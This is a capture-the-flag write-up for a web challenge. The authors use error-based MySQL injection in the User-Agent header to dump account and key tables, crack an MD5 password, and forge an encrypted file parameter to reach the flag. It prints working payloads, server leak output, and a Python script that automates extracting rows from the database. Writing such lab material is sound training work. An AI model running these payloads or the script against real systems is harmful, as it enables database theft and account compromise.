Tags: sqli web crypto 

Rating: 5.0

Our first step was to look for a vulnerability, checking the input fields in hope of SQL injection. Each time we tried to log in, the page only showed a message about an unsupported browser.

Since the server evidently inspects the browser, we moved the SQLi attempts into the User-Agent header next and managed to get a syntax error.
At this point it looks like error-based SQLi, so let's try to get the database version using the MySQL duplicate-key trick (the group key built from floor(rand(0)*2) collides, and the error message echoes the whole key, including our expression):

  • User-Agent: ' or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(1) #

Let's dump the database, getting the tables first:
  • User-Agent: ' or 1 group by concat_ws(0x3a,(select group_concat(table_name separator ',') from information_schema.tables where table_schema=database()),floor(rand(0)*2)) having min(1) #

Getting the columns of the accounts table:
  • User-Agent: ' or 1 group by concat_ws(0x3a,(select group_concat(column_name separator ',') from information_schema.columns where table_name='accounts'),floor(rand(0)*2)) having min(1) #
Warning: mysqli_query(): (23000/1062): Duplicate entry 'uid,uname,pwd,age,zipcode:1' for key '<group_key>' in /var/www/html/web500/index.php on line 57

Getting the rows:
  • User-Agent: ' or 1 group by concat_ws(0x3a,(select concat_ws(0x2c,uid,uname,pwd,age,zipcode) from accounts),floor(rand(0)*2)) having min(1) #
Warning: mysqli_query(): (23000/1062): Duplicate entry '10000,ori,6606a19f6345f8d6e998b69778cbf7ed,28,89918:1' for key '<group_key>' in /var/www/html/web500/index.php on line 57

There is only one row in the accounts table:
  • uname: ori
  • pwd: frettchen (found by looking up the hash 6606a19f6345f8d6e998b69778cbf7ed in online MD5 databases)

After logging in we can see another puzzle for this challenge



Taking a look at the URL

So we're sending a file parameter that is encoded in Base64. Checking the source of this page shows a commented-out PHP function



It's missing the $key value, so let's go back to the SQLi and dump the cryptokey table:
  • User-Agent: ' or 1 group by concat_ws(0x3a,(select group_concat(column_name separator ',') from information_schema.columns where table_name='cryptokey'),floor(rand(0)*2)) having min(1) #
Warning: mysqli_query(): (23000/1062): Duplicate entry 'id,keyval,keyfor:1' for key '<group_key>' in /var/www/html/web500/index.php on line 57

  • User-Agent: ' or 1 group by concat_ws(0x3a,(select concat_ws(0x3a,id,keyval,keyfor) from cryptokey),floor(rand(0)*2)) having min(1) #
Warning: mysqli_query(): (23000/1062): Duplicate entry '1,TheTormentofTantalus,File Access:1' for key '<group_key>' in /var/www/html/web500/index.php on line 57
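The extraction steps above (accounts columns and row, hash check, and the cryptokey dump) scripted in Python, as an added example that is not part of the original writeup: build_payload() reproduces the writeup's User-Agent payload around any SQL expression, row_expr() generalizes the single-row accounts query to tables with more rows by selecting one row at a time with LIMIT (a scalar subquery returning several rows would fail with "Subquery returns more than 1 row"), extract_leak() parses the mysqli "Duplicate entry" warning, and md5_matches() confirms a password recovered from a lookup service against the dumped hash. The target URL is hypothetical and the sample response body is constructed from the warning shown above.

```python
import hashlib
import re
import urllib.request
from typing import List, Optional

# Error-based extraction via the MySQL duplicate-key trick used in the writeup:
#   ' or 1 group by concat_ws(0x3a,<EXPR>,floor(rand(0)*2)) having min(1) #
# rand(0) is a seeded generator, so floor(rand(0)*2) yields the fixed sequence
# 0,1,1,0,1,1,...; MySQL computes the GROUP BY key once to look it up and again
# to insert it into its temporary table, so a duplicate key error fires and the
# server echoes the key, i.e. our expression, inside the error message.
# The collision is only reliable when the queried table has at least three rows.


def build_payload(expr: str) -> str:
    """Wrap an SQL expression in the writeup's error-based GROUP BY payload."""
    return f"' or 1 group by concat_ws(0x3a,{expr},floor(rand(0)*2)) having min(1) #"


def row_expr(table: str, columns: List[str], offset: int = 0) -> str:
    """Scalar subquery returning one comma-joined row of `table`, chosen by offset.
    The writeup's accounts table had a single row; with more rows the subquery
    must be limited to one, otherwise MySQL raises 'Subquery returns more than 1 row'."""
    cols = ",".join(columns)
    return f"(select concat_ws(0x2c,{cols}) from {table} limit {offset},1)"


# mysqli reports the colliding key as '<leaked value>:<0 or 1>'.
LEAK_RE = re.compile(r"Duplicate entry '(.*):[01]' for key '<group_key>'")


def extract_leak(body: str) -> Optional[str]:
    """Pull the leaked value out of a mysqli 'Duplicate entry' warning, or None."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


def fetch(url: str, user_agent: str) -> str:
    """Send one payload in the User-Agent header and return the response body."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def md5_matches(candidate: str, hexdigest: str) -> bool:
    """Confirm a password from a hash-lookup service against the dumped MD5."""
    return hashlib.md5(candidate.encode()).hexdigest() == hexdigest.lower()


# Constructed sample: the warning from the writeup's row dump, on one line.
SAMPLE_BODY = (
    "Warning: mysqli_query(): (23000/1062): Duplicate entry "
    "'10000,ori,6606a19f6345f8d6e998b69778cbf7ed,28,89918:1' for key "
    "'<group_key>' in /var/www/html/web500/index.php on line 57"
)

if __name__ == "__main__":
    # Hypothetical target URL; the writeup does not give one.
    target = "http://challenge.example/web500/index.php"
    for table, cols in (("accounts", ["uid", "uname", "pwd", "age", "zipcode"]),
                        ("cryptokey", ["id", "keyval", "keyfor"])):
        ua = build_payload(row_expr(table, cols, offset=0))
        print(table, "->", ua)
        # Live run (commented out; needs the target):
        # print(extract_leak(fetch(target, ua)))
    print("parsed from sample:", extract_leak(SAMPLE_BODY))
```

The offset in row_expr() is the loop variable for a real dump: keep incrementing it until extract_leak() returns None, which is when LIMIT runs past the last row and the subquery yields NULL.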

Adding the missing $key="TheTormentofTantalus" and calling decrypt("uWN9aYRF42LJbElOcrtjrFL6omjCL4AnkcmSuszI7aA=") returns flag-hint.
So at this point we want to encrypt "flagflagflagflag.txt", but first we need to write an encrypt function based on decrypt



Since the decrypt function takes the initialization vector from its input, we don't care about its value (random in our case). It's important to urlencode the result of base64_encode, because we'll send it as a GET parameter later and the + signs from base64 would otherwise be turned into spaces.

Time to check whether it works.
We tried to fetch a file with encrypt('flagflagflagflag.txt'), but the result was "Not allowed to read this file!". After that we started modifying the input and found a valid one:
  • encrypt('flagflagflagflag') gives "7WuFCJ5I5vPzscTaPqyq4RBhaBOtID5Oou7xa51X5vo%3D", which leads us to the flag
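The envelope handling around encrypt/decrypt, as an added Python example that is not part of the writeup: the page does not show the commented-out PHP cipher, so the block covers only what it does describe, an IV block prepended to the ciphertext, base64-encoded, then URL-encoded for the GET parameter. package() builds that envelope, unpackage() splits a parameter back into IV and ciphertext and checks the block structure, and decode_as_server_would() shows the failure mode the text warns about: a raw base64 value containing "+" is corrupted when the server parses the query string, while the percent-encoded one survives. The two base64 strings from the writeup are used as sample input; both decode to 32 bytes, one IV block plus one ciphertext block, consistent with the 16-byte name "flagflagflagflag". The 16-byte block size is an assumption.

```python
import base64
from typing import Optional, Tuple
from urllib.parse import parse_qs, quote, unquote

BLOCK = 16  # assumed block size: one IV block precedes the ciphertext


def package(iv: bytes, ciphertext: bytes) -> str:
    """Envelope expected by the challenge: base64(iv || ciphertext), percent-encoded.
    safe="" makes quote() encode '+', '/' and '=' as well, so the value is safe in a URL."""
    if len(iv) != BLOCK:
        raise ValueError("IV must be exactly one block")
    return quote(base64.b64encode(iv + ciphertext).decode(), safe="")


def unpackage(param: str) -> Tuple[bytes, bytes]:
    """Reverse of package(): percent-decode, base64-decode, split off the IV.
    validate=True rejects anything outside the base64 alphabet instead of silently
    dropping it, so a mangled parameter fails loudly."""
    raw = base64.b64decode(unquote(param), validate=True)
    if len(raw) < BLOCK or len(raw) % BLOCK:
        raise ValueError("ciphertext is not a whole number of blocks after the IV")
    return raw[:BLOCK], raw[BLOCK:]


def decode_as_server_would(query: str) -> Optional[bytes]:
    """Parse ?file=... the way a web server does (parse_qs turns '+' into a space),
    then base64-decode; returns None when the value no longer decodes."""
    value = parse_qs(query).get("file", [""])[0]
    try:
        return base64.b64decode(value, validate=True)
    except ValueError:
        return None


# Sample input: the two encoded values shown in the writeup.
HINT_PARAM = "uWN9aYRF42LJbElOcrtjrFL6omjCL4AnkcmSuszI7aA="
FLAG_PARAM = "7WuFCJ5I5vPzscTaPqyq4RBhaBOtID5Oou7xa51X5vo%3D"

if __name__ == "__main__":
    for p in (HINT_PARAM, FLAG_PARAM):
        iv, ct = unpackage(p)
        print(f"{p}: iv={len(iv)} bytes, ciphertext={len(ct)} bytes")
    # Constructed byte that base64-encodes with a leading '+': b'\xfb' -> '+w=='
    raw_b64 = base64.b64encode(b"\xfb").decode()
    print("raw in query string  :", decode_as_server_would("file=" + raw_b64))
    print("percent-encoded      :", decode_as_server_would("file=" + quote(raw_b64, safe="")))
```

The last two lines are the point of the urlencode remark: parse_qs("file=+w==") yields " w==", which is no longer valid base64, whereas "file=%2Bw%3D%3D" round-trips to the original byte.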